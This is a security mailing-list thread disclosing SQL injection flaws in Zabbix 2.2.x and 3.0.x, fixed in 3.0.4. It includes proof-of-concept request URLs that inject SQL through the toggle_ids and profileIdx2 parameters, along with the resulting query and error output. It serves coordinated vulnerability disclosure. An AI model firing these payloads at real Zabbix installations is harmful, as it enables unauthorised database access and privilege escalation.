> On Aug 12, 2016, at 10:31 PM, 1n3@xxxxxxxxxxxx wrote:
>
> Which version of Zabbix? 3.0.3?
>
Right, it’s the same vuln, just in different places. It was fixed in 3.0.4.
> -1N3
>
> On 8/12/2016 at 7:22 PM, "Brandon Perry" <bperry.volatile@xxxxxxxxx> wrote:
>>
>> I actually ended up finding this vuln in a different vector (in
>> the profileIdx2 parameter).
>>
>> /zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim
>> estamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi
>> story.php&profileIdx=web.item.graph&profileIdx2=2’3297&updateProfil
>> e=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=
>> 17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&
>> mark_color=1
>>
>>
>> <div class="flickerfreescreen" data-timestamp="1471054088083"
>> id="flickerfreescreen_1"><table class="list-table"
>> id="t57ae81946b8cb"><thead><tr><th class="cell-
>> width">Timestamp</th><th>Value</th></tr></thead><tbody><tr
>> class="nothing-to-show"><td colspan="2">No data
>> found.</td></tr></tbody></table></div><div class="msg-bad"><div
>> class="msg-details"><ul><li>Error in query [INSERT INTO profiles
>> (profileid, userid, idx, value_int, type, idx2) VALUES (39, 1,
>> 'web.item.graph.period', '3600', 2, 2'3297)] [You have an error in
>> your SQL syntax; check the manual that corresponds to your MySQL
>> server version for the right syntax to use near ''3297)' at line
>> 1]</li><li>Error in query [INSERT INTO profiles (profileid,
>> userid, idx, value_str, type, idx2) VALUES (40, 1,
>> 'web.item.graph.stime', '20160813041028', 3, 2'3297)] [You have an
>> error in your SQL syntax; check the manual that corresponds to
>> your MySQL server version for the right syntax to use near
>> ''3297)' at line 1]</li><li>Error in query [INSERT INTO profiles
>> (profileid, userid, idx, value_int, type, idx2) VALUES (41, 1,
>> 'web.item.graph.isnow', '1', 2, 2'3297)] [You have an error in
>> your SQL syntax; check the manual that corresponds to your MySQL
>> server version for the right syntax to use near ''3297)' at line
>> 1]</li></ul></div><span class="overlay-close-btn"
>> onclick="javascript: $(this).closest('.msg-bad').remove();"
>> title="Close"></span></div>
>>
>>
>> Similarly, it requires auth unless you enable Guest.
>>
>>
>>> On Aug 11, 2016, at 7:23 PM, 1n3@xxxxxxxxxxxx wrote:
>>>
>>> =========================================
>>> Title: Zabbix 3.0.3 SQL Injection Vulnerability
>>> Product: Zabbix
>>> Vulnerable Version(s): 2.2.x, 3.0.x
>>> Fixed Version: 3.0.4
>>> Homepage: http://www.zabbix.com
>>> Patch link: https://support.zabbix.com/browse/ZBX-11023
>>> Credit: 1N3@CrowdShield
>>> ==========================================
>>>
>>>
>>> Vendor Description:
>>> =====================
>>> Zabbix is an open source availability and performance monitoring
>> solution.
>>>
>>>
>>> Vulnerability Overview:
>>> =====================
>>> Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL
>> injection vulnerability due to a failure to sanitize input in the
>> toggle_ids array in the latest.php page.
>>>
>>>
>>> Business Impact:
>>> =====================
>>> By exploiting this SQL injection vulnerability, an authenticated
>> attacker (or guest user) is able to gain full access to the
>> database. This would allow an attacker to escalate their
>> privileges to a power user, compromise the database, or execute
>> commands on the underlying database operating system.
>>>
>>> Because of the functionalities Zabbix offers, an attacker with
>> admin privileges (depending on the configuration) can execute
>> arbitrary OS commands on the configured Zabbix hosts and server.
>> This results in a severe impact to the monitored infrastructure.
>>>
>>> Although the attacker needs to be authenticated in general, the
>> system could also be at risk if the adversary has no user account.
>> Zabbix offers a guest mode which provides a low privileged default
>> account for users without password. If this guest mode is enabled,
>> the SQL injection vulnerability can be exploited unauthenticated.
>>>
>>>
>>> Proof of Concept:
>>> =====================
>>>
>>>
>> latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggl
>> e_ids[]=15385); select * from users where (1=1
>>>
>>> Result:
>>> SQL (0.000361): INSERT INTO profiles (profileid, userid, idx,
>> value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2,
>> 15385); select * from users where (1=1)
>>> latest.php:746 → require_once() → CProfile::flush() →
>> CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-
>> svn/branches/2.2/frontends/php/include/profiles.inc.php:185
>>>
>>>
>>> Disclosure Timeline:
>>> =====================
>>>
>>> 7/18/2016 - Reported vulnerability to Zabbix
>>> 7/21/2016 - Zabbix responded with permission to file CVE and to
>> disclose after a patch is made public
>>> 7/22/2016 - Zabbix released patch for vulnerability
>>> 8/3/2016 - CVE details submitted
>>> 8/11/2016 - Vulnerability details disclosed
>>>
>>>
>>> _______________________________________________
>>> Sent through the Full Disclosure mailing list
>>> https://nmap.org/mailman/listinfo/fulldisclosure
>>> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
Attachment:
signature.asc
Description: Message signed with OpenPGP using GPGMail
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/